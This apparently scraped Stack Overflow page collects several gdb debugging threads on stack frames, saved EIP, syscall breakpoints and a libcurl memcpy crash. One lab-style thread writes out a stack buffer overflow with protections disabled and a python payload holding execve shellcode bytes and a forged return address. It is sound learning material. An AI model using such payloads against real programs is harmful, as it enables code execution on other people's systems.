I have a piece of code that just strcpy() the argv1 in a buffer of 100 bytes long. After that I am placing for testing purposes the exit(0) or exit(1) function. Nothing else used. What I am getting back from gdb is the following
(gdb) i r eip
eip 0x8048455 0x8048455 <main+65>
(gdb) info frame
Stack level 0, frame at 0xbffff260:
eip = 0x8048455 in main (exploitable.c:9); saved eip 0x41414141
source language c.
Arglist at 0xbffff258, args: argc=1094795585, argv=0xbffff304
Locals at 0xbffff258, Previous frame's sp is 0xbffff260
Saved registers:
ebp at 0xbffff258, eip at 0xbffff25c
(gdb) i r eip
eip 0x8048455 0x8048455 <main+65>
(gdb) c
Continuing.
[Inferior 1 (process 2829) exited normally]
Since the saved eip is 0x41414141 why after leaving this current stack the execution is going to the invalid 0x41414141 address? For sure it has something to do with the exit function but I cant understand it :/
I know that the explanation is in the following code but I cant get it
=> 0x08048455 <+65>: mov DWORD PTR [esp],0x0
0x0804845c <+72>: call 0x8048350 <exit#plt>
The last line implies that the execution goes to the exit function and im not sure that the 0x08040455 line shows the 0 argument that passes to exit function. Exit function does not have any leave / ret instructions when it is running ? Because the saved-eip of the frame that is "just" outside the main is overwritten!
The exit function does not return. It calls function defined with atexit(), does some cleanup, and terminates the process by calling Linux with function 0 (EXIT).
Use return 1 / return 0 instead of exit(1) / exit(0), if you want to check what happens with your EIP after main() is finished.
Related
I've been recently interested in reading books and articles about hacking and I found out that Hacking:The art of exploitation is just a must read title. I am following the basic tutorials on how to work with standard Linux tools and analyze your code (Programming chapter). I am not a beginner in programming but working with Linux terminal is quite new for me. I am using the latest release of Kali Linux.
Right now my simple program below should be used to analyze how stack segment works.
int main(){
void stack_func(int a,int b, int c, int d){
char first;
int second;
first = 'c';
second = 220;
}
stack_func(1,2,3,4);
return 0;
}
The first problem is I cannot add any breakpoints for internal functions. Neither mine functions like stack_func() nor functions from libraries like strcpy etc. According to the book the pending breakpoint should resolve. Mine is just ignored and program finishes.
root#root:~/Folder# gdb -q ./stack
Reading symbols from ./stack...done.
(gdb) b stack_func
Function "stack_func" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (stack_func) pending.
(gdb) run
Starting program: /root/Folder/stack
[Inferior 1 (process 20421) exited normally]
(gdb)
The second problem is that disassemble also doesn't work for my function. Again according to the book I should be able to see assembler code for my function stack_func() but the result is below.
(gdb) disass stack_func()
No symbol "stack_func" in current context.
(gdb)
I appologize for any grammatical errors in text. :)
The problem is that you defined stack_func inside another function. This is called nested function and it is gcc extension in GNU C. This function has a bit other symbol name than you expect. To find out it's exact symbol name you can use nm tool:
[ tmp]$ nm a.out |grep stack_func
00000000004004a6 t stack_func.1761
And set breakpoint and disassemble in gdb:
[ tmp]$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) b 'stack_func.1761'
Breakpoint 1 at 0x4004ba: file 111.c, line 6.
(gdb) disassemble 'stack_func.1761'
Dump of assembler code for function stack_func:
0x00000000004004a6 <+0>: push %rbp
0x00000000004004a7 <+1>: mov %rsp,%rbp
0x00000000004004aa <+4>: mov %edi,-0x14(%rbp)
0x00000000004004ad <+7>: mov %esi,-0x18(%rbp)
0x00000000004004b0 <+10>: mov %edx,-0x1c(%rbp)
0x00000000004004b3 <+13>: mov %ecx,-0x20(%rbp)
0x00000000004004b6 <+16>: mov %r10,-0x28(%rbp)
0x00000000004004ba <+20>: movb $0x63,-0x1(%rbp)
0x00000000004004be <+24>: movl $0xdc,-0x8(%rbp)
0x00000000004004c5 <+31>: nop
0x00000000004004c6 <+32>: pop %rbp
0x00000000004004c7 <+33>: retq
End of assembler dump.
(gdb)
OS: GNU/Linux
Distro: OpenSuSe 13.1
Arch: x86-64
GDB version: 7.6.50.20130731-cvs
Program language: mostly C with minor bits of assembly
Imagine that I've got rather big program that sometimes fails to open a file. Is it possible to set breakpoint in GDB in such way that it stops after open(2) syscall returns -1?
Of course, I can grep through the source code and find all open(2) invocations and narrow down the faulting open() call but maybe there's a better way.
I tried to use "catch syscall open" then "condition N if $rax==-1" but obviously it didn't get hit.
BTW, Is it possible to distinct between a call to syscall (e.g. open(2)) and return from syscall (e.g. open(2)) in GDB?
As a current workaround I do the following:
Run the program in question under the GDB
From another terminal launch systemtap script:
stap -g -v -e 'probe process("PATH to the program run under GDB").syscall.return { if( $syscall == 2 && $return <0) raise(%{ SIGSTOP %}) }'
After open(2) returns -1 I receive SIGSTOP in GDB session and I can debug the issue.
TIA.
Best regards,
alexz.
UPD: Even though I tried the approach suggested by n.m before and wasn't able to make it work I decided to give it another try. After 2 hours it now works as intended. But with some weird workaround:
I still can't distinct between call and return from syscall
If I use finish in comm I can't use continue, which is OK according to GDB docs
i.e. the following does drop to gdb prompt on each break:
gdb> comm
gdb> finish
gdb> printf "rax is %d\n",$rax
gdb> cont
gdb> end
Actually I can avoid using finish and check %rax in commands but in this case I have to check for -errno rather than -1 e.g. if it's "Permission denied" then I have to check for "-13" and if it's "No such file or direcory" - then for -2. It's just simply not right
So the only way to make it work for me was to define custom function and use it in the following way:
(gdb) catch syscall open
Catchpoint 1 (syscall 'open' [2]
(gdb) define mycheck
Type commands for definition of "mycheck".
End with a line saying just "end".
>finish
>finish
>if ($rax != -1)
>cont
>end
>printf "rax is %d\n",$rax
>end
(gdb) comm
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>mycheck
>end
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/alexz/gdb_syscall_test/main
.....
Catchpoint 1 (returned from syscall open), 0x00007ffff7b093f0 in __open_nocancel () from /lib64/libc.so.6
0x0000000000400756 in main (argc=1, argv=0x7fffffffdb18) at main.c:24
24 fd = open(filenames[i], O_RDONLY);
Opening test1
fd = 3 (0x3)
Successfully opened test1
Catchpoint 1 (call to syscall open), 0x00007ffff7b093f0 in __open_nocancel () from /lib64/libc.so.6
rax is -38
Catchpoint 1 (returned from syscall open), 0x00007ffff7b093f0 in __open_nocancel () from /lib64/libc.so.6
0x0000000000400756 in main (argc=1, argv=0x7fffffffdb18) at main.c:24
---Type <return> to continue, or q <return> to quit---
24 fd = open(filenames[i], O_RDONLY);
rax is -1
(gdb) bt
#0 0x0000000000400756 in main (argc=1, argv=0x7fffffffdb18) at main.c:24
(gdb) step
26 printf("Opening %s\n", filenames[i]);
(gdb) info locals
i = 1
fd = -1
This gdb script does what's requested:
set $outside = 1
catch syscall open
commands
silent
set $outside = ! $outside
if ( $outside && $rax >= 0)
continue
end
if ( !$outside )
continue
end
echo `open' returned a negative value\n
end
The $outside variable is needed because gdb stops both at syscall enter and syscall exit. We need to ignore enter events and check $rax only at exit.
Is it possible to set breakpoint in GDB in such way that it stops after open(2) syscall returns -1?
It's hard to do better than n.m.s answer for this narrow question, but I would argue that the question is posed incorrectly.
Of course, I can grep through the source code and find all open(2) invocations
That is part of your confusion: when you call open in a C program, you are not in fact executing open(2) system call. Rather, you are invoking an open(3) "stub" from your libc, and that stub will execute the open(2) system call for you.
And if you want to set a breakpoint when the stub is about to return -1, that is very easy.
Example:
/* t.c */
#include <sys/stat.h>
#include <fcntl.h>
int main()
{
int fd = open("/no/such/file", O_RDONLY);
return fd == -1 ? 0 : 1;
}
$ gcc -g t.c; gdb -q ./a.out
(gdb) start
Temporary breakpoint 1 at 0x4004fc: file t.c, line 6.
Starting program: /tmp/a.out
Temporary breakpoint 1, main () at t.c:6
6 int fd = open("/no/such/file", O_RDONLY);
(gdb) s
open64 () at ../sysdeps/unix/syscall-template.S:82
82 ../sysdeps/unix/syscall-template.S: No such file or directory.
Here we've reached the glibc system call stub. Let's disassemble it:
(gdb) disas
Dump of assembler code for function open64:
=> 0x00007ffff7b01d00 <+0>: cmpl $0x0,0x2d74ad(%rip) # 0x7ffff7dd91b4 <__libc_multiple_threads>
0x00007ffff7b01d07 <+7>: jne 0x7ffff7b01d19 <open64+25>
0x00007ffff7b01d09 <+0>: mov $0x2,%eax
0x00007ffff7b01d0e <+5>: syscall
0x00007ffff7b01d10 <+7>: cmp $0xfffffffffffff001,%rax
0x00007ffff7b01d16 <+13>: jae 0x7ffff7b01d49 <open64+73>
0x00007ffff7b01d18 <+15>: retq
0x00007ffff7b01d19 <+25>: sub $0x8,%rsp
0x00007ffff7b01d1d <+29>: callq 0x7ffff7b1d050 <__libc_enable_asynccancel>
0x00007ffff7b01d22 <+34>: mov %rax,(%rsp)
0x00007ffff7b01d26 <+38>: mov $0x2,%eax
0x00007ffff7b01d2b <+43>: syscall
0x00007ffff7b01d2d <+45>: mov (%rsp),%rdi
0x00007ffff7b01d31 <+49>: mov %rax,%rdx
0x00007ffff7b01d34 <+52>: callq 0x7ffff7b1d0b0 <__libc_disable_asynccancel>
0x00007ffff7b01d39 <+57>: mov %rdx,%rax
0x00007ffff7b01d3c <+60>: add $0x8,%rsp
0x00007ffff7b01d40 <+64>: cmp $0xfffffffffffff001,%rax
0x00007ffff7b01d46 <+70>: jae 0x7ffff7b01d49 <open64+73>
0x00007ffff7b01d48 <+72>: retq
0x00007ffff7b01d49 <+73>: mov 0x2d10d0(%rip),%rcx # 0x7ffff7dd2e20
0x00007ffff7b01d50 <+80>: xor %edx,%edx
0x00007ffff7b01d52 <+82>: sub %rax,%rdx
0x00007ffff7b01d55 <+85>: mov %edx,%fs:(%rcx)
0x00007ffff7b01d58 <+88>: or $0xffffffffffffffff,%rax
0x00007ffff7b01d5c <+92>: jmp 0x7ffff7b01d48 <open64+72>
End of assembler dump.
Here you can see that the stub behaves differently depending on whether the program has multiple threads or not. This has to do with asynchronous cancellation.
There are two syscall instructions, and in the general case we'd need to set a breakpoint after each one (but see below).
But this example is single-threaded, so I can set a single conditional breakpoint:
(gdb) b *0x00007ffff7b01d10 if $rax < 0
Breakpoint 2 at 0x7ffff7b01d10: file ../sysdeps/unix/syscall-template.S, line 82.
(gdb) c
Continuing.
Breakpoint 2, 0x00007ffff7b01d10 in __open_nocancel () at ../sysdeps/unix/syscall-template.S:82
82 in ../sysdeps/unix/syscall-template.S
(gdb) p $rax
$1 = -2
Voila, the open(2) system call returned -2, which the stub will translate into setting errno to ENOENT (which is 2 on this system) and returning -1.
If the open(2) succeeded, the condition $rax < 0 would be false, and GDB will keep going.
That is precisely the behavior one usually wants from GDB when looking for one failing system call among many succeeding ones.
Update:
As Chris Dodd points out, there are two syscalls, but on error they both branch to the same error-handling code (the code that sets errno). Thus, we can set an un-conditional breakpoint on *0x00007ffff7b01d49, and that breakpoint will fire only on failure.
This is much better, because conditional breakpoints slow down execution quite a lot when the condition is false (GDB has to stop the inferior, evaluate the condition, and resume the inferior if the condition is false).
I have the following program:
void test_function(int a,int b, int c, int d){
int flag;
char buffer[10];
flag = 31337;
buffer[0]='A';
}
int main(){
test_function(1,2,3,4);
}
I compiled it with gcc -g option.
I am setting 2 breakpoints one just before the test_function call inside main and one right after.
(gdb) list
1 void test_function(int a,int b, int c, int d){
2 int flag;
3 char buffer[10];
4
5 flag = 31337;
6 buffer[0]='A';
7 }
8
9 int main(){
10 test_function(1,2,3,4);
(gdb) break 10
Breakpoint 1 at 0x804843c: file stackexample.c, line 10.
(gdb) break test_function
Breakpoint 2 at 0x804840a: file stackexample.c, line 1.
(gdb) run
Starting program: /root/tests/c-tests/./stackexample
Breakpoint 1, main () at stackexample.c:10
10 test_function(1,2,3,4);
(gdb) i r esp ebp eip
esp 0xbffff4d0 0xbffff4d0
ebp 0xbffff4e8 0xbffff4e8
eip 0x804843c 0x804843c <main+9>
According to my knowledge, 0xbffff4d0 this address is the current bottom of the stack (top-highest address) and this will be used for the creation (reference) of the new stack frame after the call of test_function.
(gdb) x/5i $eip
=> 0x804843c <main+9>: mov DWORD PTR [esp+0xc],0x4
0x8048444 <main+17>: mov DWORD PTR [esp+0x8],0x3
0x804844c <main+25>: mov DWORD PTR [esp+0x4],0x2
0x8048454 <main+33>: mov DWORD PTR [esp],0x1
0x804845b <main+40>: call 0x8048404 <test_function>
Before the test_function call the arguments are stored with these mov instructions.
(gdb) info frame
Stack level 0, frame at 0xbffff4f0:
eip = 0x804843c in main (stackexample.c:10); saved eip 0xb7e8bbd6
source language c.
Arglist at 0xbffff4e8, args:
Locals at 0xbffff4e8, Previous frame's sp is 0xbffff4f0
Saved registers:
ebp at 0xbffff4e8, eip at 0xbffff4ec
(gdb) cont
Continuing.
Breakpoint 2, test_function (a=1, b=2, c=3, d=4) at stackexample.c:1
1 void test_function(int a,int b, int c, int d){
(gdb) info frame
Stack level 0, frame at 0xbffff4d0:
eip = 0x804840a in test_function (stackexample.c:1); saved eip 0x8048460
called by frame at 0xbffff4f0
source language c.
Arglist at 0xbffff4c8, args: a=1, b=2, c=3, d=4
Locals at 0xbffff4c8, Previous frame's sp is 0xbffff4d0
Saved registers:
ebp at 0xbffff4c8, eip at 0xbffff4cc
(gdb) i r esp ebp eip
esp 0xbffff4a0 0xbffff4a0
ebp 0xbffff4c8 0xbffff4c8
eip 0x804840a 0x804840a <test_function+6>
So here its obvious that first frame's esp became the current starting address of this frame. Although what I dont get is in which stack frame the arguments are ??? because...
(gdb) info locals
flag = 134513420
buffer = "\377\267\364\237\004\b\350\364\377\277"
Here we cannot see the args. If we ..
(gdb) info args
a = 1
b = 2
c = 3
d = 4
(gdb) print &a
$4 = (int *) 0xbffff4d0
(gdb) print &b
$5 = (int *) 0xbffff4d4
(gdb) print &c
$6 = (int *) 0xbffff4d8
(gdb) print &d
$7 = (int *) 0xbffff4dc
So here we see that the arguments are starting from the first address that this current stack frame has which is 0xbffff4d0
And the other question is the following according to this output
(gdb) x/16xw $esp
0xbffff4a0: 0xb7fc9ff4 0x08049ff4 0xbffff4b8 0x0804830c
0xbffff4b0: 0xb7ff1080 0x08049ff4 0xbffff4e8 0x08048499
0xbffff4c0: 0xb7fca324 0xb7fc9ff4 0xbffff4e8 0x08048460
0xbffff4d0: 0x00000001 0x00000002 0x00000003 0x00000004
Address 0x08048460 is the eip = 0x804840a in test_function (stackexample.c:1); saved eip 0x8048460 and also `#1 0x08048460 in main () at stackexample.c:10 (output from backtrace)
How come and RET to main is on top (into a lower address) than the arguments ? Shouldnt ret address be in the start of the new stack frame? Sorry but I am trying to understand how stack works and I am kinda confused :S Another thing that I dont undestand is that the reference for the local variables is happening through $esp+(offset). Does the value of esp is always depending on the "current" stack frame that the execution is?
Your disassembled program looks like this on my system:
gcc -m32 -c -o stackexample.o stackexample.c
objdump -d -M intel stackexample.o
test_function:
push ebp
mov ebp,esp
sub esp,0x10
mov DWORD PTR [ebp-0x4],0x7a69
mov BYTE PTR [ebp-0xe],0x41
leave
ret
main:
push ebp
mov ebp,esp
sub esp,0x10
mov DWORD PTR [esp+0xc],0x4
mov DWORD PTR [esp+0x8],0x3
mov DWORD PTR [esp+0x4],0x2
mov DWORD PTR [esp],0x1
call test_function
leave
ret
Let's start from the beginning.
Stack is arranged from top to bottom in memory. The top of the stack has the lowest address.
esp is the Stack Pointer. It always points to the top of the stack.
ebp is the Base Pointer. It points to the bottom of current stack frame. It is used for referencing current function's arguments and local variables.
These instructions
push ebp
mov ebp,esp
can be found at the top of every function. They do the following:
save caller's Base Pointer
setup current function's Base Pointer by assigning it to Stack Pointer. At this point Stack Pointer points to bottom of current stack frame, so by assigning Base Pointer to it, Base Pointer will show current bottom. Stack Pointer can increase/decrease during function's execution, so you use Base Pointer to reference the variables. Base Pointer also servers for saving/storing caller's Stack Pointer.
leave is equivalent to
mov esp, ebp
pop ebp
which is the exact opposite of the instructions above:
restore caller's Stack Pointer
restore caller's Base Pointer
Now to answer your questions
in which stack frame the arguments are ???
Arguments are stored in caller's stack frame. However you can use Base Pointer to access them. info locals does not display the information about the function arguments as part of gdb's specification:
http://visualgdb.com/gdbreference/commands/info_locals
How come and RET to main is on top (into a lower address) than the arguments ? Shouldnt ret address be in the start of the new stack frame
That's because arguments are stored in caller's frame. When test_function is called, the stack already has the arguments stored, so the returned address is stored higher (aka lower address) than the arguments.
reference for the local variables is happening through $esp+(offset).
As far as I know, referencing local variables can happen both using the Base Pointer and the Stack Pointer - whichever is convenient for your compiler (not really sure).
Does the value of esp is always depending on the "current" stack frame that the execution is?
Yes. Stack Pointer is THE most important stack register. It points to the top of the stack.
I'm doing a stack overflow experiment with aslr and nx disabled. But the gdb show up a weird result.
Environment:
Linux 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali5 i686 GNU/Linux
Disable aslr:
echo 0 > /proc/sys/kernel/randomize_va_space
Compiled the source with execstatck(Debian has no kernel parameter named exec-shield):
gcc 1.c -fno-stack-protector -z execstack -mpreferred-stack-boundary=2
Here's description of the problem:
(gdb) disas main
Dump of assembler code for function main:
0x0804841c <+0>: push %ebp
0x0804841d <+1>: mov %esp,%ebp
0x0804841f <+3>: sub $0x208,%esp
0x08048425 <+9>: mov 0xc(%ebp),%eax
0x08048428 <+12>: add $0x4,%eax
0x0804842b <+15>: mov (%eax),%eax
0x0804842d <+17>: mov %eax,0x4(%esp)
0x08048431 <+21>: lea -0x200(%ebp),%eax
0x08048437 <+27>: mov %eax,(%esp)
0x0804843a <+30>: call 0x8048300 <strcpy#plt>
0x0804843f <+35>: mov $0x0,%eax
0x08048444 <+40>: leave
0x08048445 <+41>: ret
End of assembler dump.
(gdb) run `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xba"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/xxx/tests/a.out `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xba"'`
Program received signal SIGSEGV, Segmentation fault.
0xbafff87d in ?? ()
program is leaded to 0xbafff87d and crashed.This is under expectation.
So i change the address from 0xbafff87d to the address of shellcode: 0xbffff87d.
(gdb) run `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/xxx/tests/a.out `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xbf"'`
Program received signal SIGSEGV, Segmentation fault.
0xbffff88d in ?? ()
(gdb) i r $eip
eip 0xbffff88d 0xbffff88d
but the program is leaded to 0xbffff88d instead of 0xbffff87d and crashed.The last one byte of the return address has been modified. Why?
I try to add a breakpoint before the function 'leave' (0x08048444 <+40>: leave ):
(gdb) b *0x08048444
Breakpoint 1 at 0x8048444
#run the program with the large payload as above
Breakpoint 1, 0x08048444 in main ()
(gdb) x/2x $ebp
0xbffff518: 0x41414141 0xbffff87d
#the return addr is indeed overwritten to 0xbffff87d
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffff88d in ?? ()
the eip is still leaded to 0xbffff88d.
I cannot figure out what makes the return address modified and when this happned.
Maybe I miss out some knowledge there. Beside the question above, I also think that gdb sometimes 'cache' the running result of the debugged program, becase sometimes the gdb show me the same result while I already change the parameters.
Thanks in advance :)
=======
Update for answering Leeor's comment:
It also crash outside gdb. Segmentation fault. The coredump file shows the eip is 0xbffff88b when segfaulted.(While my overwritten value is 0xbffff87d, the last byte is modified)
Manually overwriting the return address:
(gdb) b *0x08048444
Breakpoint 1 at 0x8048444
(gdb) run test
Starting program: /home/xxx/tests/a.out test
Breakpoint 1, 0x08048444 in main ()
(gdb) x/2x $ebp
0xbffff718: 0xbffff798 0xb7e7ae46
(gdb) x/2 0xbffff71c
0xbffff71c: 0xb7e7ae46 0x00000002
(gdb) set *0xbffff71c=0xbffff87d
(gdb) x/2x $ebp
0xbffff718: 0xbffff798 0xbffff87d
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffff87d in ?? ()
This is working as I expect(There is no valid shellcode at 0xbffff87d cause I run with parameter test. I found that when a "illegal instruction" error occurred, gdb still tell you it's Segment Fault).
But it's still not working while I run it with overflow payload:
(gdb) run `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xbf"'`
Starting program: /home/xxx/tests/a.out `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xbf"'`
Breakpoint 1, 0x08048444 in main ()
(gdb) x/2x $ebp
0xbffff508: 0x41414141 0xbffff87d
(gdb) set *0xbffff50c=0xbffff87d
(gdb) x/2x $ebp
0xbffff508: 0x41414141 0xbffff87d
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffff88b in ?? ()
The last byte of return address is modified.
I'd say execution goes to the correct address first, just that the instruction there doesn't happen to crash. Try some of the following:
use si instead of c
put a breakpoint on 0xbffff87d
disassemble code at 0xbffff87d
Since your address is on the stack, the contents may be different when stack layout changes. Note that the command line argument is also on the stack, so your runs with test and the actual payload use different stack layout.
I'm using libcurl in my program, and running into a segfault. Before I filed a bug with the curl project, I thought I'd do a little debugging. What I found seemed very odd to me, and I haven't been able to make sense of it yet.
First, the segfault traceback:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffe77f6700 (LWP 592)]
0x00007ffff6a2ea5c in memcpy () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0 0x00007ffff6a2ea5c in memcpy () from /lib/x86_64-linux-gnu/libc.so.6
#1 0x00007ffff5bc29e5 in x509_name_oneline (a=0x7fffe3d9c3c0,
buf=0x7fffe77f4ec0 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%", size=255) at ssluse.c:629
#2 0x00007ffff5bc2a6f in cert_verify_callback (ok=1, ctx=0x7fffe77f50b0)
at ssluse.c:645
#3 0x00007ffff72c9a80 in ?? () from /lib/libcrypto.so.0.9.8
#4 0x00007ffff72ca430 in X509_verify_cert () from /lib/libcrypto.so.0.9.8
#5 0x00007ffff759af58 in ssl_verify_cert_chain () from /lib/libssl.so.0.9.8
#6 0x00007ffff75809f3 in ssl3_get_server_certificate ()
from /lib/libssl.so.0.9.8
#7 0x00007ffff7583e50 in ssl3_connect () from /lib/libssl.so.0.9.8
#8 0x00007ffff5bc48f0 in ossl_connect_step2 (conn=0x7fffe315e9a8, sockindex=0)
at ssluse.c:1724
#9 0x00007ffff5bc700f in ossl_connect_common (conn=0x7fffe315e9a8,
sockindex=0, nonblocking=false, done=0x7fffe77f543f) at ssluse.c:2498
#10 0x00007ffff5bc7172 in Curl_ossl_connect (conn=0x7fffe315e9a8, sockindex=0)
at ssluse.c:2544
#11 0x00007ffff5ba76b9 in Curl_ssl_connect (conn=0x7fffe315e9a8, sockindex=0)
...
The call to memcpy looks like this:
memcpy(buf, biomem->data, size);
(gdb) p buf
$46 = 0x7fffe77f4ec0 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%"
(gdb) p biomem->data
$47 = 0x7fffe3e1ef60 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%"
(gdb) p size
$48 = 255
If I go up a frame, I see that the pointer passed in for buf came from a local variable defined in the calling function:
char buf[256];
Here's where it starts to get weird. I can manually inspect all 256 bytes of both buf and biomem->data without gdb complaining that the memory isn't accesible. I can also manually write all 256 bytes of buf using the gdb set command, without any error. So if all the memory involved is readable and writable, why does memcpy fail?
Also interesting is that I can use gdb to manually call memcpy with the pointers involved. As long as I pass a size <= 160, it runs without a problem. As soon as I pass 161 or higher, gdb gets a sigsegv. I know buf is larger than 160, because it was created on the stack as an array of 256. biomem->data is a little harder to figure, but I can read well past byte 160 with gdb.
I should also mention that this function (or rather the curl method I call that leads to this) completes successfully many times before the crash. My program uses curl to repeatedly call a web service API while it runs. It calls the API every five seconds or so, and runs for about 14 hours before it crashes. It's possible that something else in my app is writing out of bounds and stomping on something that creates the error condition. But it seems suspicious that it crashes at exactly the same point every time, although the timing varies. And all the pointers seem ok in gdb, but memcpy still fails. Valgrind doesn't find any bounds errors, but I haven't let my program run with valgrind for 14 hours.
Within memcpy itself, the disassembly looks like this:
(gdb) x/20i $rip-10
0x7ffff6a2ea52 <memcpy+242>: jbe 0x7ffff6a2ea74 <memcpy+276>
0x7ffff6a2ea54 <memcpy+244>: lea 0x20(%rdi),%rdi
0x7ffff6a2ea58 <memcpy+248>: je 0x7ffff6a2ea90 <memcpy+304>
0x7ffff6a2ea5a <memcpy+250>: dec %ecx
=> 0x7ffff6a2ea5c <memcpy+252>: mov (%rsi),%rax
0x7ffff6a2ea5f <memcpy+255>: mov 0x8(%rsi),%r8
0x7ffff6a2ea63 <memcpy+259>: mov 0x10(%rsi),%r9
0x7ffff6a2ea67 <memcpy+263>: mov 0x18(%rsi),%r10
0x7ffff6a2ea6b <memcpy+267>: mov %rax,(%rdi)
0x7ffff6a2ea6e <memcpy+270>: mov %r8,0x8(%rdi)
0x7ffff6a2ea72 <memcpy+274>: mov %r9,0x10(%rdi)
0x7ffff6a2ea76 <memcpy+278>: mov %r10,0x18(%rdi)
0x7ffff6a2ea7a <memcpy+282>: lea 0x20(%rsi),%rsi
0x7ffff6a2ea7e <memcpy+286>: lea 0x20(%rdi),%rdi
0x7ffff6a2ea82 <memcpy+290>: jne 0x7ffff6a2ea30 <memcpy+208>
0x7ffff6a2ea84 <memcpy+292>: data32 data32 nopw %cs:0x0(%rax,%rax,1)
0x7ffff6a2ea90 <memcpy+304>: and $0x1f,%edx
0x7ffff6a2ea93 <memcpy+307>: mov -0x8(%rsp),%rax
0x7ffff6a2ea98 <memcpy+312>: jne 0x7ffff6a2e969 <memcpy+9>
0x7ffff6a2ea9e <memcpy+318>: repz retq
(gdb) info registers
rax 0x0 0
rbx 0x7fffe77f50b0 140737077268656
rcx 0x1 1
rdx 0xff 255
rsi 0x7fffe3e1f000 140737016623104
rdi 0x7fffe77f4f60 140737077268320
rbp 0x7fffe77f4e90 0x7fffe77f4e90
rsp 0x7fffe77f4e48 0x7fffe77f4e48
r8 0x11 17
r9 0x10 16
r10 0x1 1
r11 0x7ffff6a28f7a 140737331236730
r12 0x7fffe3dde490 140737016358032
r13 0x7ffff5bc2a0c 140737316137484
r14 0x7fffe3d69b50 140737015880528
r15 0x0 0
rip 0x7ffff6a2ea5c 0x7ffff6a2ea5c <memcpy+252>
eflags 0x10203 [ CF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) p/x $rsi
$50 = 0x7fffe3e1f000
(gdb) x/20x $rsi
0x7fffe3e1f000: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f030: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f040: 0x00000000 0x00000000 0x00000000 0x00000000
I'm using libcurl version 7.21.6, c-ares version 1.7.4, and openssl version 1.0.0d. My program is multithreaded, but I have registered mutex callbacks with openssl. The program is running on Ubuntu 11.04 desktop, 64-bit. libc is 2.13.
Clearly libcurl is over-reading the source buffer, and stepping into unreadable memory (page at 0x7fffe3e1f000 -- you can confirm that memory is unreadable by looking at /proc/<pid>/maps for the program being debugged).
Here's where it starts to get weird. I can manually inspect all 256 bytes of both
buf and biomem->data without gdb complaining that the memory isn't accesible.
There is a well-known Linux kernel flaw: even for memory that has PROT_NONE (and causes SIGSEGV on attempt to read it from the process itself), attempt by GDB to ptrace(PEEK_DATA,...) succeeds. That explains why you can examine 256 bytes of the source buffer in GDB, even though only 96 of them are actually accessible.
Try running your program under Valgrind, chances are it will tell you that you are memcpying into heap-allocated buffer that is too small.
Do you any possibility of creating a "crumple zone"?
That is, deliberately increasing the size of the two buffers, or in the case of the structure putting an extra unused element after the destination?
You then seed the source crumple with something such as "0xDEADBEEF", and the destination with som with something nice. If the destination every changes you've got something to work with.
256 is a bit suggestive, any possibility it could somehow be being treated as signed quantity, becoming -1, and hence very big? Can't see how gdb wouldn't show it, but ...